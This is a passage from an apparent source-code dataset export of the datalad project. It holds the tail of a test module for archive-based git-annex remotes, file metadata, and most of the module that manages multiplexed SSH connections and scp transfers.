serve_path_via_http,\n swallow_logs,\n with_tempfile,\n with_tree,\n)\nfrom ...utils import unlink\nfrom ..archives import (\n ArchiveAnnexCustomRemote,\n link_file_load,\n)\n\n\n# TODO: with_tree ATM for archives creates this nested top directory\n# matching archive name, so it will be a/d/test.dat ... we don't want that probably\n@known_failure_githubci_win\n@with_tree(\n tree=(('a.tar.gz', {'d': {fn_in_archive_obscure: '123'}}),\n ('simple.txt', '123'),\n (fn_archive_obscure_ext, (('d', ((fn_in_archive_obscure, '123'),)),)),\n (fn_archive_obscure, '123')))\n@with_tempfile()\ndef test_basic_scenario(d=None, d2=None):\n fn_archive, fn_extracted = fn_archive_obscure_ext, fn_archive_obscure\n annex = AnnexRepo(d, backend='MD5E')\n annex.init_remote(\n ARCHIVES_SPECIAL_REMOTE,\n ['encryption=none', 'type=external', 'externaltype=%s' % ARCHIVES_SPECIAL_REMOTE,\n 'autoenable=true'\n ])\n assert annex.is_special_annex_remote(ARCHIVES_SPECIAL_REMOTE)\n # We want two maximally obscure names, which are also different\n assert(fn_extracted != fn_in_archive_obscure)\n annex.add(fn_archive)\n annex.commit(msg=\"Added tarball\")\n annex.add(fn_extracted)\n annex.commit(msg=\"Added the load file\")\n\n # Operations with archive remote URL\n # this is not using this class for its actual purpose\n # being a special remote implementation\n # likely all this functionality should be elsewhere\n annexcr = ArchiveAnnexCustomRemote(annex=None, path=d)\n # few quick tests for get_file_url\n\n eq_(annexcr.get_file_url(archive_key=\"xyz\", file=\"a.dat\"), \"dl+archive:xyz#path=a.dat\")\n eq_(annexcr.get_file_url(archive_key=\"xyz\", file=\"a.dat\", size=999), \"dl+archive:xyz#path=a.dat&size=999\")\n\n # see https://github.com/datalad/datalad/issues/441#issuecomment-223376906\n # old style\n eq_(annexcr._parse_url(\"dl+archive:xyz/a.dat#size=999\"), (\"xyz\", \"a.dat\", {'size': 999}))\n eq_(annexcr._parse_url(\"dl+archive:xyz/a.dat\"), (\"xyz\", \"a.dat\", {})) # old format without size\n # new style\n eq_(annexcr._parse_url(\"dl+archive:xyz#path=a.dat&size=999\"), (\"xyz\", \"a.dat\", {'size': 999}))\n eq_(annexcr._parse_url(\"dl+archive:xyz#path=a.dat\"), (\"xyz\", \"a.dat\", {})) # old format without size\n\n file_url = annexcr.get_file_url(\n archive_file=fn_archive,\n 
file=fn_archive.replace('.tar.gz', '') + '/d/' + fn_in_archive_obscure)\n\n annex.add_url_to_file(fn_extracted, file_url, ['--relaxed'])\n annex.drop(fn_extracted)\n\n list_of_remotes = annex.whereis(fn_extracted, output='descriptions')\n in_('[%s]' % ARCHIVES_SPECIAL_REMOTE, list_of_remotes)\n\n assert_false(annex.file_has_content(fn_extracted))\n\n with swallow_logs(new_level=logging.INFO) as cml:\n annex.get(fn_extracted)\n # Hint users to the extraction cache (and to datalad clean)\n cml.assert_logged(msg=\"datalad-archives special remote is using an \"\n \"extraction\", level=\"INFO\", regex=False)\n assert_true(annex.file_has_content(fn_extracted))\n\n annex.rm_url(fn_extracted, file_url)\n assert_raises(CommandError, annex.drop, fn_extracted)\n\n annex.add_url_to_file(fn_extracted, file_url)\n annex.drop(fn_extracted)\n annex.get(fn_extracted)\n annex.drop(fn_extracted) # so we don't get from this one next\n\n # Let's create a clone and verify chain of getting file through the tarball\n cloned_annex = AnnexRepo.clone(d, d2)\n # we still need to enable manually atm that special remote for archives\n # cloned_annex.enable_remote('annexed-archives')\n\n assert_false(cloned_annex.file_has_content(fn_archive))\n assert_false(cloned_annex.file_has_content(fn_extracted))\n cloned_annex.get(fn_extracted)\n assert_true(cloned_annex.file_has_content(fn_extracted))\n # as a result it would also fetch tarball\n assert_true(cloned_annex.file_has_content(fn_archive))\n\n # verify that we can drop if original archive gets dropped but available online:\n # -- done as part of the test_add_archive_content.py\n # verify that we can't drop a file if archive key was dropped and online archive was removed or changed size! ;)\n\n\n@known_failure_githubci_win\n@with_tree(\n tree={'a.tar.gz': {'d': {fn_in_archive_obscure: '123'}}}\n)\ndef test_annex_get_from_subdir(topdir=None):\n ds = Dataset(topdir)\n ds.create(force=True)\n ds.save('a.tar.gz')\n ds.add_archive_content('a.tar.gz', delete=True)\n fpath = op.join(topdir, 'a', 'd', fn_in_archive_obscure)\n\n with chpwd(op.join(topdir, 'a', 'd')):\n runner = WitlessRunner()\n runner.run(\n ['git', 'annex', 'drop', '--', fn_in_archive_obscure],\n protocol=KillOutput) # run git annex drop\n assert_false(ds.repo.file_has_content(fpath)) # and verify if file deleted from directory\n runner.run(\n ['git', 'annex', 'get', '--', fn_in_archive_obscure],\n protocol=KillOutput) # run git annex get\n assert_true(ds.repo.file_has_content(fpath)) # and verify if file got into directory\n\n\ndef test_get_git_environ_adjusted():\n gitrunner = GitWitlessRunner()\n env = {\"GIT_DIR\": \"../../.git\", \"GIT_WORK_TREE\": \"../../\", \"TEST_VAR\": \"Exists\"}\n\n # test conversion of relevant env vars from relative_path to correct absolute_path\n adj_env = gitrunner.get_git_environ_adjusted(env)\n assert_equal(adj_env[\"GIT_DIR\"], abspath(env[\"GIT_DIR\"]))\n assert_equal(adj_env[\"GIT_WORK_TREE\"], abspath(env[\"GIT_WORK_TREE\"]))\n\n # test if other environment variables passed to function returned unaltered\n assert_equal(adj_env[\"TEST_VAR\"], env[\"TEST_VAR\"])\n\n # test import of sys_env if no environment passed to function\n with patch.dict('os.environ', {'BOGUS': '123'}):\n sys_env = gitrunner.get_git_environ_adjusted()\n assert_equal(sys_env[\"BOGUS\"], \"123\")\n\n\ndef test_no_rdflib_loaded():\n # rely on rdflib polluting stdout to see that it is not loaded whenever we load this remote\n # since that adds 300ms delay for no immediate use\n runner = WitlessRunner()\n 
out = runner.run(\n [sys.executable,\n '-c',\n 'import datalad.customremotes.archives, sys; '\n 'print([k for k in sys.modules if k.startswith(\"rdflib\")])'],\n protocol=StdOutErrCapture)\n # print cmo.out\n assert_not_in(\"rdflib\", out['stdout'])\n assert_not_in(\"rdflib\", out['stderr'])\n\n\n@with_tree(tree=\n {'1.tar.gz':\n {\n 'bu.dat': '52055957098986598349795121365535' * 10000,\n 'bu3.dat': '8236397048205454767887168342849275422' * 10000\n },\n '2.tar.gz':\n {\n 'bu2.dat': '17470674346319559612580175475351973007892815102' * 10000\n },\n }\n)\n@serve_path_via_http()\n@with_tempfile\ndef check_observe_tqdm(topdir=None, topurl=None, outdir=None):\n # just a helper to enable/use when want quickly to get some\n # repository with archives and observe tqdm\n from datalad.api import (\n add_archive_content,\n create,\n )\n ds = create(outdir)\n for f in '1.tar.gz', '2.tar.gz':\n with chpwd(outdir):\n ds.repo.add_url_to_file(f, topurl + f)\n ds.save(f)\n add_archive_content(f, delete=True, drop_after=True)\n files = glob.glob(op.join(outdir, '*'))\n ds.drop(files) # will not drop tarballs\n ds.repo.drop([], options=['--all', '--fast'])\n ds.get(files)\n ds.repo.drop([], options=['--all', '--fast'])\n # now loop so we could play with it outside\n print(outdir)\n # import pdb; pdb.set_trace()\n while True:\n sleep(0.1)\n\n\n@known_failure_githubci_win\n@with_tempfile\ndef test_link_file_load(tempfile=None):\n tempfile2 = tempfile + '_'\n\n with open(tempfile, 'w') as f:\n f.write(\"LOAD\")\n\n link_file_load(tempfile, tempfile2) # this should work in general\n\n ok_(os.path.exists(tempfile2))\n\n with open(tempfile2, 'r') as f:\n assert_equal(f.read(), \"LOAD\")\n\n def inode(fname):\n with open(fname) as fd:\n return os.fstat(fd.fileno()).st_ino\n\n def stats(fname, times=True):\n \"\"\"Return stats on the file which should have been preserved\"\"\"\n with open(fname) as fd:\n st = os.fstat(fd.fileno())\n stats = (st.st_mode, st.st_uid, st.st_gid, st.st_size)\n if times:\n return stats + (st.st_atime, st.st_mtime)\n else:\n return stats\n # despite copystat mtime is not copied. 
TODO\n # st.st_mtime)\n\n # TODO: fix up the test to not rely on OS assumptions but rather\n # first sense filesystem about linking support.\n # For Yarik's Windows 10 VM test was failing under assumption that\n # linking is not supported at all, but I guess it does.\n if True: # on_linux or on_osx:\n # above call should result in the hardlink\n assert_equal(inode(tempfile), inode(tempfile2))\n assert_equal(stats(tempfile), stats(tempfile2))\n\n # and if we mock absence of .link\n def raise_AttributeError(*args):\n raise AttributeError(\"TEST\")\n\n with patch('os.link', raise_AttributeError):\n with swallow_logs(logging.WARNING) as cm:\n link_file_load(tempfile, tempfile2) # should still work\n ok_(\"failed (TEST), copying file\" in cm.out)\n\n # should be a copy (after mocked call)\n assert_not_equal(inode(tempfile), inode(tempfile2))\n with open(tempfile2, 'r') as f:\n assert_equal(f.read(), \"LOAD\")\n assert_equal(stats(tempfile, times=False), stats(tempfile2, times=False))\n unlink(tempfile2) # TODO: next two with_tempfile\n" }, { "alpha_fraction": 0.5832383036613464, "alphanum_fraction": 0.5857414603233337, "avg_line_length": 35.78321838378906, "blob_id": "c56010eb455dfd623a4063161fdd2f24a672d7c1", "content_id": "fe6847fec38950f1cb38d2888f9b62619130f5db", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31560, "license_type": "permissive", "max_line_length": 105, "num_lines": 858, "path": "/datalad/support/sshconnector.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Interface to an ssh connection.\n\nAllows for connecting via ssh and keeping the connection open\n(by using a controlmaster), in order to perform several ssh commands or\ngit calls to a ssh remote without the need to reauthenticate.\n\"\"\"\n\nimport fasteners\nimport os\nimport logging\nfrom socket import gethostname\nfrom hashlib import md5\nfrom subprocess import Popen\nimport tempfile\nimport threading\n\n\n# importing the quote function here so it can always be imported from this\n# module\n# this used to be shlex.quote(), but is now a cross-platform helper\nfrom datalad.utils import quote_cmdlinearg as sh_quote\n\n# !!! Do not import network here -- delay import, allows to shave off 50ms or so\n# on initial import datalad time\n# from datalad.support.network import RI, is_ssh\n\nfrom datalad.support.exceptions import (\n CapturedException,\n CommandError,\n ConnectionOpenFailedError,\n)\nfrom datalad.support.external_versions import (\n external_versions,\n)\nfrom datalad.utils import (\n auto_repr,\n Path,\n ensure_list,\n on_windows,\n)\nfrom datalad.cmd import (\n NoCapture,\n StdOutErrCapture,\n WitlessRunner,\n)\n\nlgr = logging.getLogger('datalad.support.sshconnector')\n\n\ndef get_connection_hash(hostname, port='', username='', identity_file='',\n bundled=None, force_ip=False):\n \"\"\"Generate a hash based on SSH connection properties\n\n This can be used for generating filenames that are unique\n to a connection from and to a particular machine (with\n port and login username). 
The hash also contains the local\n host name.\n\n Identity file corresponds to a file that will be passed via ssh's -i\n option.\n\n All parameters correspond to the respective properties of an SSH\n connection, except for `bundled`, which is unused.\n\n .. deprecated:: 0.16\n The ``bundled`` argument is ignored.\n \"\"\"\n if bundled is not None:\n import warnings\n warnings.warn(\n \"The `bundled` argument of `get_connection_hash()` is ignored. \"\n \"It will be removed in a future release.\",\n DeprecationWarning)\n # returning only first 8 characters to minimize our chance\n # of hitting a limit on the max path length for the Unix socket.\n # Collisions would be very unlikely even if we used less than 8.\n # References:\n # https://github.com/ansible/ansible/issues/11536#issuecomment-153030743\n # https://github.com/datalad/datalad/pull/1377\n\n # The \"# nosec\" below skips insecure hash checks by 'codeclimate'. The hash\n # is not security critical, since it is only used as an \"abbreviation\" of\n # the unique connection property string.\n return md5( # nosec\n '{lhost}{rhost}{port}{identity_file}{username}{force_ip}'.format(\n lhost=gethostname(),\n rhost=hostname,\n port=port,\n identity_file=identity_file,\n username=username,\n force_ip=force_ip or ''\n ).encode('utf-8')).hexdigest()[:8]\n\n\n@auto_repr\nclass BaseSSHConnection(object):\n \"\"\"Representation of an SSH connection.\n \"\"\"\n def __init__(self, sshri, identity_file=None,\n use_remote_annex_bundle=None, force_ip=False):\n \"\"\"Create a connection handler\n\n The actual opening of the connection is performed on-demand.\n\n Parameters\n ----------\n sshri: SSHRI\n SSH resource identifier (contains all connection-relevant info),\n or another resource identifier that can be converted into an SSHRI.\n identity_file : str or None\n Value to pass to ssh's -i option.\n use_remote_annex_bundle : bool, optional\n If enabled, look for a git-annex installation on the remote and\n prefer its Git binaries in the search path (i.e. prefer a bundled\n Git over a system package). See also the configuration setting\n datalad.ssh.try-use-annex-bundled-git\n force_ip : {False, 4, 6}\n Force the use of IPv4 or IPv6 addresses with -4 or -6.\n\n .. versionchanged:: 0.16\n The default for `use_remote_annex_bundle` changed from `True`\n to `None`. 
Instead of attempting to use a potentially available\n git-annex bundle on the remote host by default, this behavior\n is now conditional on the `datalad.ssh.try-use-annex-bundled-git`\n (off by default).\n \"\"\"\n self._runner = None\n self._ssh_executable = None\n self._ssh_version = None\n\n from datalad.support.network import SSHRI, is_ssh\n if not is_ssh(sshri):\n raise ValueError(\n \"Non-SSH resource identifiers are not supported for SSH \"\n \"connections: {}\".format(sshri))\n self.sshri = SSHRI(**{k: v for k, v in sshri.fields.items()\n if k in ('username', 'hostname', 'port')})\n # arguments only used for opening a connection\n self._ssh_open_args = []\n # arguments for annex ssh invocation\n self._ssh_args = []\n self._ssh_open_args.extend(\n ['-p', '{}'.format(self.sshri.port)] if self.sshri.port else [])\n if force_ip:\n self._ssh_open_args.append(\"-{}\".format(force_ip))\n if identity_file:\n self._ssh_open_args.extend([\"-i\", identity_file])\n\n self._use_remote_annex_bundle = use_remote_annex_bundle\n # essential properties of the remote system\n self._remote_props = {}\n\n def __call__(self, cmd, options=None, stdin=None, log_output=True):\n \"\"\"Executes a command on the remote.\n\n It is the callers responsibility to properly quote commands\n for remote execution (e.g. filename with spaces of other special\n characters).\n\n Parameters\n ----------\n cmd: str\n command to run on the remote\n options : list of str, optional\n Additional options to pass to the `-o` flag of `ssh`. Note: Many\n (probably most) of the available configuration options should not be\n set here because they can critically change the properties of the\n connection. This exists to allow options like SendEnv to be set.\n log_output: bool\n Whether to capture and return stdout+stderr.\n\n Returns\n -------\n tuple of str\n stdout, stderr of the command run, if `log_output` was `True`\n \"\"\"\n raise NotImplementedError\n\n def open(self):\n \"\"\"Opens the connection.\n\n Returns\n -------\n bool\n To return True if connection establishes a control socket successfully.\n Return False otherwise\n \"\"\"\n\n raise NotImplementedError\n\n def close(self):\n \"\"\"Closes the connection.\n \"\"\"\n\n raise NotImplementedError\n\n @property\n def ssh_executable(self):\n \"\"\"determine which ssh client executable should be used.\n \"\"\"\n if not self._ssh_executable:\n from datalad import cfg\n self._ssh_executable = cfg.obtain(\"datalad.ssh.executable\")\n return self._ssh_executable\n\n @property\n def runner(self):\n if self._runner is None:\n self._runner = WitlessRunner()\n return self._runner\n\n @property\n def ssh_version(self):\n if self._ssh_version is None:\n ssh_version = external_versions[\"cmd:ssh\"]\n self._ssh_version = ssh_version.version if ssh_version else None\n return self._ssh_version\n\n def _adjust_cmd_for_bundle_execution(self, cmd):\n from datalad import cfg\n # locate annex and set the bundled vs. 
system Git machinery in motion\n if self._use_remote_annex_bundle \\\n or cfg.obtain('datalad.ssh.try-use-annex-bundled-git'):\n remote_annex_installdir = self.get_annex_installdir()\n if remote_annex_installdir:\n # make sure to use the bundled git version if any exists\n cmd = '{}; {}'.format(\n 'export \"PATH={}:$PATH\"'.format(remote_annex_installdir),\n cmd)\n return cmd\n\n def _exec_ssh(self, ssh_cmd, cmd, options=None, stdin=None, log_output=True):\n cmd = self._adjust_cmd_for_bundle_execution(cmd)\n\n for opt in options or []:\n ssh_cmd.extend([\"-o\", opt])\n\n # build SSH call, feed remote command as a single last argument\n # whatever it contains will go to the remote machine for execution\n # we cannot perform any sort of escaping, because it will limit\n # what we can do on the remote, e.g. concatenate commands with '&&'\n ssh_cmd += [self.sshri.as_str()] + [cmd]\n\n lgr.debug(\"%s is used to run %s\", self, ssh_cmd)\n\n # TODO: pass expect parameters from above?\n # Hard to explain to toplevel users ... So for now, just set True\n out = self.runner.run(\n ssh_cmd,\n protocol=StdOutErrCapture if log_output else NoCapture,\n stdin=stdin)\n return out['stdout'], out['stderr']\n\n def _get_scp_command_spec(self, recursive, preserve_attrs):\n \"\"\"Internal helper for SCP interface methods\"\"\"\n # Convert ssh's port flag (-p) to scp's (-P).\n scp_options = [\"-P\" if x == \"-p\" else x for x in self._ssh_args]\n # add recursive, preserve_attributes flag if recursive, preserve_attrs set and create scp command\n scp_options += [\"-r\"] if recursive else []\n scp_options += [\"-p\"] if preserve_attrs else []\n return [\"scp\"] + scp_options\n\n def _quote_filename(self, filename):\n if self.ssh_version and self.ssh_version[0] < 9:\n return _quote_filename_for_scp(filename)\n\n # no filename quoting for OpenSSH version 9 and above\n return filename\n\n def put(self, source, destination, recursive=False, preserve_attrs=False):\n \"\"\"Copies source file/folder to destination on the remote.\n\n Note: this method performs escaping of filenames to an extent that\n moderately weird ones should work (spaces, quotes, pipes, other\n characters with special shell meaning), but more complicated cases\n might require appropriate external preprocessing of filenames.\n\n Parameters\n ----------\n source : str or list\n file/folder path(s) to copy from on local\n destination : str\n file/folder path to copy to on remote\n recursive : bool\n flag to enable recursive copying of given sources\n preserve_attrs : bool\n preserve modification times, access times, and modes from the\n original file\n\n Returns\n -------\n str\n stdout, stderr of the copy operation.\n \"\"\"\n # make sure we have an open connection, will test if action is needed\n # by itself\n self.open()\n scp_cmd = self._get_scp_command_spec(recursive, preserve_attrs)\n # add source filepath(s) to scp command\n scp_cmd += ensure_list(source)\n # add destination path\n scp_cmd += ['%s:%s' % (\n self.sshri.hostname,\n self._quote_filename(destination),\n )]\n out = self.runner.run(scp_cmd, protocol=StdOutErrCapture)\n return out['stdout'], out['stderr']\n\n def get(self, source, destination, recursive=False, preserve_attrs=False):\n \"\"\"Copies source file/folder from remote to a local destination.\n\n Note: this method performs escaping of filenames to an extent that\n moderately weird ones should work (spaces, quotes, pipes, other\n characters with special shell meaning), but more complicated cases\n might require appropriate 
external preprocessing of filenames.\n\n Parameters\n ----------\n source : str or list\n file/folder path(s) to copy from the remote host\n destination : str\n file/folder path to copy to on the local host\n recursive : bool\n flag to enable recursive copying of given sources\n preserve_attrs : bool\n preserve modification times, access times, and modes from the\n original file\n\n Returns\n -------\n str\n stdout, stderr of the copy operation.\n \"\"\"\n # make sure we have an open connection, will test if action is needed\n # by itself\n self.open()\n scp_cmd = self._get_scp_command_spec(recursive, preserve_attrs)\n # add source filepath(s) to scp command, prefixed with the remote host\n scp_cmd += [\"%s:%s\" % (self.sshri.hostname, self._quote_filename(s))\n for s in ensure_list(source)]\n # add destination path\n scp_cmd += [destination]\n out = self.runner.run(scp_cmd, protocol=StdOutErrCapture)\n return out['stdout'], out['stderr']\n\n def get_annex_installdir(self):\n key = 'installdir:annex'\n if key in self._remote_props:\n return self._remote_props[key]\n annex_install_dir = None\n # already set here to avoid any sort of recursion until we know\n # more\n self._remote_props[key] = annex_install_dir\n try:\n with tempfile.TemporaryFile() as tempf:\n # TODO does not work on windows\n annex_install_dir = self(\n # use sh -e to be able to fail at each stage of the process\n \"sh -e -c 'dirname $(readlink -f $(which git-annex-shell))'\"\n , stdin=tempf\n )[0].strip()\n except CommandError as e:\n lgr.debug('Failed to locate remote git-annex installation: %s',\n CapturedException(e))\n self._remote_props[key] = annex_install_dir\n return annex_install_dir\n\n def get_annex_version(self):\n key = 'cmd:annex'\n if key in self._remote_props:\n return self._remote_props[key]\n try:\n # modern annex versions\n version = self('git annex version --raw')[0]\n except CommandError:\n # either no annex, or old version\n try:\n # fall back on method that could work with older installations\n out, err = self('git annex version')\n version = out.split('\\n')[0].split(':')[1].strip()\n except CommandError as e:\n lgr.debug('Failed to determine remote git-annex version: %s',\n CapturedException(e))\n version = None\n self._remote_props[key] = version\n return version\n\n def get_git_version(self):\n key = 'cmd:git'\n if key in self._remote_props:\n return self._remote_props[key]\n git_version = None\n try:\n git_version = self('git version')[0].split()[2]\n except CommandError as e:\n lgr.debug('Failed to determine Git version: %s',\n CapturedException(e))\n self._remote_props[key] = git_version\n return git_version\n\n\n@auto_repr\nclass NoMultiplexSSHConnection(BaseSSHConnection):\n \"\"\"Representation of an SSH connection.\n\n The connection is opened for execution of a single process, and closed\n as soon as the process end.\n \"\"\"\n def __call__(self, cmd, options=None, stdin=None, log_output=True):\n\n # there is no dedicated \"open\" step, put all args together\n ssh_cmd = [self.ssh_executable] + self._ssh_open_args + self._ssh_args\n return self._exec_ssh(\n ssh_cmd,\n cmd,\n options=options,\n stdin=stdin,\n log_output=log_output)\n\n def is_open(self):\n return False\n\n def open(self):\n return False\n\n def close(self):\n # we perform blocking execution, we should not return from __call__ until\n # the connection is already closed\n pass\n\n\n@auto_repr\nclass MultiplexSSHConnection(BaseSSHConnection):\n \"\"\"Representation of a (shared) ssh connection.\n \"\"\"\n def __init__(self, 
ctrl_path, sshri, **kwargs):\n \"\"\"Create a connection handler\n\n The actual opening of the connection is performed on-demand.\n\n Parameters\n ----------\n ctrl_path: str\n path to SSH controlmaster\n sshri: SSHRI\n SSH resource identifier (contains all connection-relevant info),\n or another resource identifier that can be converted into an SSHRI.\n **kwargs\n Pass on to BaseSSHConnection\n \"\"\"\n super().__init__(sshri, **kwargs)\n\n # on windows cmd args lists are always converted into a string using appropriate\n # quoting rules, on other platforms args lists are passed directly and we need\n # to take care of quoting ourselves\n ctrlpath_arg = \"ControlPath={}\".format(ctrl_path if on_windows else sh_quote(str(ctrl_path)))\n self._ssh_args += [\"-o\", ctrlpath_arg]\n self._ssh_open_args += [\n \"-fN\",\n \"-o\", \"ControlMaster=auto\",\n \"-o\", \"ControlPersist=15m\",\n ]\n self.ctrl_path = Path(ctrl_path)\n self._opened_by_us = False\n # used by @fasteners.locked\n self._lock = [\n threading.Lock(),\n fasteners.process_lock.InterProcessLock(self.ctrl_path.with_suffix('.lck'))\n ]\n\n def __call__(self, cmd, options=None, stdin=None, log_output=True):\n\n # XXX: check for open socket once\n # and provide roll back if fails to run and was not explicitly\n # checked first\n # MIH: this would mean that we would have to distinguish failure\n # of a payload command from failure of SSH itself. SSH however,\n # only distinguishes success and failure of the entire operation\n # Increase in fragility from introspection makes a potential\n # performance benefit a questionable improvement.\n # make sure we have an open connection, will test if action is needed\n # by itself\n self.open()\n\n ssh_cmd = [self.ssh_executable] + self._ssh_args\n return self._exec_ssh(\n ssh_cmd,\n cmd,\n options=options,\n stdin=stdin,\n log_output=log_output)\n\n def _assemble_multiplex_ssh_cmd(self, additional_arguments):\n return [self.ssh_executable] \\\n + additional_arguments \\\n + self._ssh_args \\\n + [self.sshri.as_str()]\n\n def is_open(self):\n if not self.ctrl_path.exists():\n lgr.log(\n 5,\n \"Not opening %s for checking since %s does not exist\",\n self, self.ctrl_path\n )\n return False\n # check whether controlmaster is still running:\n cmd = self._assemble_multiplex_ssh_cmd([\"-O\", \"check\"])\n\n lgr.debug(\"Checking %s by calling %s\", self, cmd)\n try:\n # expect_stderr since ssh would announce to stderr\n # \"Master is running\" and that is normal, not worthy warning about\n # etc -- we are doing the check here for successful operation\n with tempfile.TemporaryFile() as tempf:\n self.runner.run(\n cmd,\n # do not leak output\n protocol=StdOutErrCapture,\n stdin=tempf)\n res = True\n except CommandError as e:\n if e.code != 255:\n # this is not a normal SSH error, whine ...\n raise e\n # SSH died and left socket behind, or server closed connection\n self.close()\n res = False\n lgr.debug(\n \"Check of %s has %s\",\n self,\n {True: 'succeeded', False: 'failed'}[res])\n return res\n\n @fasteners.locked\n def open(self):\n \"\"\"Opens the connection.\n\n In other words: Creates the SSH ControlMaster to be used by this\n connection, if it is not there already.\n\n Returns\n -------\n bool\n True when SSH reports success opening the connection, False when\n a ControlMaster for an open connection already exists.\n\n Raises\n ------\n ConnectionOpenFailedError\n When starting the SSH ControlMaster process failed.\n \"\"\"\n # the socket should vanish almost instantly when the connection 
closes\n # sending explicit 'check' commands to the control master is expensive\n # (needs tempfile to shield stdin, Runner overhead, etc...)\n # as we do not use any advanced features (forwarding, stop[ing the\n # master without exiting) it should be relatively safe to just perform\n # the much cheaper check of an existing control path\n if self.ctrl_path.exists():\n return False\n\n # create ssh control master command\n cmd = self._assemble_multiplex_ssh_cmd(self._ssh_open_args)\n\n # start control master:\n lgr.debug(\"Opening %s by calling %s\", self, cmd)\n # The following call is exempt from bandit's security checks because\n # we/the user control the content of 'cmd'.\n proc = Popen(cmd) # nosec\n stdout, stderr = proc.communicate(input=\"\\n\") # why the f.. this is necessary?\n\n # wait till the command exits, connection is conclusively\n # open or not at this point\n exit_code = proc.wait()\n\n if exit_code != 0:\n raise ConnectionOpenFailedError(\n cmd,\n 'Failed to open SSH connection (could not start ControlMaster process)',\n exit_code,\n stdout,\n stderr,\n )\n self._opened_by_us = True\n return True\n\n def close(self):\n if not self._opened_by_us:\n lgr.debug(\"Not closing %s since was not opened by itself\", self)\n return\n # stop controlmaster:\n cmd = self._assemble_multiplex_ssh_cmd([\"-O\", \"stop\"])\n lgr.debug(\"Closing %s by calling %s\", self, cmd)\n try:\n self.runner.run(cmd, protocol=StdOutErrCapture)\n except CommandError as e:\n lgr.debug(\"Failed to run close command\")\n if self.ctrl_path.exists():\n lgr.debug(\"Removing existing control path %s\", self.ctrl_path)\n # socket need to go in any case\n self.ctrl_path.unlink()\n if e.code != 255:\n # not a \"normal\" SSH error\n raise e\n\n\n@auto_repr\nclass BaseSSHManager(object):\n \"\"\"Interface for an SSHManager\n \"\"\"\n def ensure_initialized(self):\n \"\"\"Ensures that manager is initialized\"\"\"\n pass\n\n assure_initialized = ensure_initialized\n\n def get_connection(self, url, use_remote_annex_bundle=None, force_ip=False):\n \"\"\"Get an SSH connection handler\n\n Parameters\n ----------\n url: str\n ssh url\n use_remote_annex_bundle : bool, optional\n If enabled, look for a git-annex installation on the remote and\n prefer its Git binaries in the search path (i.e. prefer a bundled\n Git over a system package). See also the configuration setting\n datalad.ssh.try-use-annex-bundled-git\n force_ip : {False, 4, 6}\n Force the use of IPv4 or IPv6 addresses.\n\n Returns\n -------\n BaseSSHConnection\n\n .. versionchanged:: 0.16\n The default for `use_remote_annex_bundle` changed from `True`\n to `None`. 
Instead of attempting to use a potentially available\n git-annex bundle on the remote host by default, this behavior\n is now conditional on the `datalad.ssh.try-use-annex-bundled-git`\n (off by default).\n \"\"\"\n raise NotImplementedError\n\n def _prep_connection_args(self, url):\n # parse url:\n from datalad.support.network import RI, is_ssh\n if isinstance(url, RI):\n sshri = url\n else:\n if ':' not in url and '/' not in url:\n # it is just a hostname\n lgr.debug(\"Assuming %r is just a hostname for ssh connection\",\n url)\n url += ':'\n sshri = RI(url)\n\n if not is_ssh(sshri):\n raise ValueError(\"Unsupported SSH URL: '{0}', use \"\n \"ssh://host/path or host:path syntax\".format(url))\n\n from datalad import cfg\n identity_file = cfg.get(\"datalad.ssh.identityfile\")\n return sshri, identity_file\n\n def close(self, allow_fail=True):\n \"\"\"Closes all connections, known to this instance.\n\n Parameters\n ----------\n allow_fail: bool, optional\n If True, swallow exceptions which might be thrown during\n connection.close, and just log them at DEBUG level\n \"\"\"\n pass\n\n\n@auto_repr\nclass NoMultiplexSSHManager(BaseSSHManager):\n \"\"\"Does not \"manage\" and just returns a new connection\n \"\"\"\n\n def get_connection(self, url, use_remote_annex_bundle=None, force_ip=False):\n sshri, identity_file = self._prep_connection_args(url)\n\n return NoMultiplexSSHConnection(\n sshri,\n identity_file=identity_file,\n use_remote_annex_bundle=use_remote_annex_bundle,\n force_ip=force_ip,\n )\n\n\n@auto_repr\nclass MultiplexSSHManager(BaseSSHManager):\n \"\"\"Keeps ssh connections to share. Serves singleton representation\n per connection.\n\n A custom identity file can be specified via `datalad.ssh.identityfile`.\n Callers are responsible for reloading `datalad.cfg` if they have changed\n this value since loading datalad.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self._socket_dir = None\n self._connections = dict()\n # Initialization of prev_connections is happening during initial\n # handling of socket_dir, so we do not define them here explicitly\n # to an empty list to fail if logic is violated\n self._prev_connections = None\n # and no explicit initialization in the constructor\n # self.ensure_initialized()\n\n @property\n def socket_dir(self):\n \"\"\"Return socket_dir, and if was not defined before,\n and also pick up all previous connections (if any)\n \"\"\"\n self.ensure_initialized()\n return self._socket_dir\n\n def ensure_initialized(self):\n \"\"\"Assures that manager is initialized - knows socket_dir, previous connections\n \"\"\"\n if self._socket_dir is not None:\n return\n from datalad import cfg\n self._socket_dir = Path(cfg.obtain('datalad.locations.sockets'))\n self._socket_dir.mkdir(exist_ok=True, parents=True)\n try:\n os.chmod(str(self._socket_dir), 0o700)\n except OSError as exc:\n lgr.warning(\n \"Failed to (re)set permissions on the %s. \"\n \"Most likely future communications would be impaired or fail. \"\n \"Original exception: %s\",\n self._socket_dir, CapturedException(exc)\n )\n\n try:\n self._prev_connections = [p\n for p in self.socket_dir.iterdir()\n if not p.is_dir()]\n except OSError as exc:\n self._prev_connections = []\n lgr.warning(\n \"Failed to list %s for existing sockets. \"\n \"Most likely future communications would be impaired or fail. 
